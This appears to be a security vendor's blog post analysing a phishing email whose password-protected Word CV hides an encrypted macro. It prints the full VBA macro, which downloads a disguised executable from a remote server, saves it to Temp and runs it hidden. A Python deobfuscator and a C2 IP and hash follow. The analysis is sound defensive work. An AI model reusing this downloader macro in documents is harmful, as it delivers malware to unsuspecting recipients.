Malicious Activity: Would You Hire a Hacker?
Would you? The HR department of one of our clients received an email with a CV attached. The email stated that the attached Word document was password protected and supplied the password in the email body. The user has to type the password in manually, a step that can cause problems for an automated system that checks the file for malicious activity.
Once the user enters the password, the file turns out to be a familiar attack: a malicious macro that executes malicious commands. The macro code is also encrypted, making detection even harder.
Perception Point's file decryption feature extracts the malicious code from the encrypted file. The code downloads a malicious exe from a server to the temp folder and runs it.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    ' Fetch the payload; the ".jpg" URL disguises an executable download
    WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
    WinHttpReq.send
    Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    ' The ChrW chains build "ADODB.Stream" without the string ever appearing in plain text
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
    xyuhjnx = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject(last5)
        oStream.Open
        oStream.Type = Val("1FFF")   ' Val() stops at the first non-digit, so this is 1 (adTypeBinary)
        oStream.Write WinHttpReq.responseBody
        Dim first6 As String
        Dim last6 As String
        ' Decodes to "\check.exe"; assigned but never used
        first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
        last6 = first6
        ' Val("2FFF") is 2 (adSaveCreateOverWrite): drop the download into the user's Temp folder
        oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
        oStream.Close
    End If
    ' Window style 0 (vbHide): run the dropped file with no visible window
    Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub
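The ChrW chains are the part of this macro a scanner has to see through. The following Python is an added example written for this post, not Perception Point's own tooling: it decodes each ChrW chain, evaluates Val("1FFF") to the 1 that VBA actually produces, and follows the first5 + second5 concatenation to recover "ADODB.Stream" and "\check.exe". The trimmed macro lines are embedded as the sample input, and the tokens in SUSPICIOUS are my choice.

```python
import re
# Constructed sample: the string-building lines of the macro above (ChrW chains, concatenation, Val()).
MACRO = r'''
first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
second5 = ChrW(97) & ChrW(109)
last5 = first5 + second5
oStream.Type = Val("1FFF")
first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
last6 = first6
'''

CHR_CHAIN = re.compile(r'(?:ChrW?\(\d+\)\s*&\s*)+ChrW?\(\d+\)')  # ChrW(65) & ChrW(68) & ...
VAL_CALL = re.compile(r'Val\("([^"]*)"\)')

def vba_val(s: str) -> int:
    """Mimic VBA Val(): read the leading number and stop at the first non-numeric character."""
    m = re.match(r'\s*[-+]?\d+', s)
    return int(m.group()) if m else 0

def deobfuscate(macro: str) -> str:
    """Collapse each ChrW chain into a quoted literal and each Val("...") into the number VBA computes."""
    chain_to_literal = lambda m: '"' + ''.join(chr(int(n)) for n in re.findall(r'\((\d+)\)', m.group())) + '"'
    out = CHR_CHAIN.sub(chain_to_literal, macro)
    return VAL_CALL.sub(lambda m: str(vba_val(m.group(1))), out)

def resolve_strings(macro: str) -> dict:
    """Walk assignments top to bottom, joining literals and already-known variables ("a" & b, a + b)."""
    env = {}
    for line in deobfuscate(macro).splitlines():
        m = re.match(r'\s*(\w+)\s*=\s*(.+?)\s*$', line)
        if not m:
            continue
        name, expr, parts = m.group(1), m.group(2), []
        for part in re.split(r'\s*[&+]\s*', expr):
            if len(part) >= 2 and part[0] == part[-1] == '"':
                parts.append(part[1:-1])          # string literal
            elif part in env:
                parts.append(env[part])           # variable resolved earlier
            else:
                break                             # not a pure string expression; skip it
        else:
            env[name] = ''.join(parts)
    return env

SUSPICIOUS = ('ADODB.Stream', '.exe', 'Microsoft.XMLHTTP', 'Shell')  # tokens worth surfacing (my choice)

def hidden_indicators(macro: str) -> dict:
    """Return {variable: decoded string} for every resolved string that contains a suspicious token."""
    return {name: val for name, val in resolve_strings(macro).items()
            if any(tok.lower() in val.lower() for tok in SUSPICIOUS)}
```

The resolver only handles concatenation of literals and previously assigned variables, which is exactly what this macro uses; a sandbox that runs the VBA is still the reliable way to see what more elaborate builders produce.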
IOCs
C2 server IP: 209.141.55.226
qwerty2.exe (SHA-256): 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3
VirusTotal score: 12/69 (2019-02-21 15:13:33 UTC)
Learn more about how we protect our clients against malicious activity here.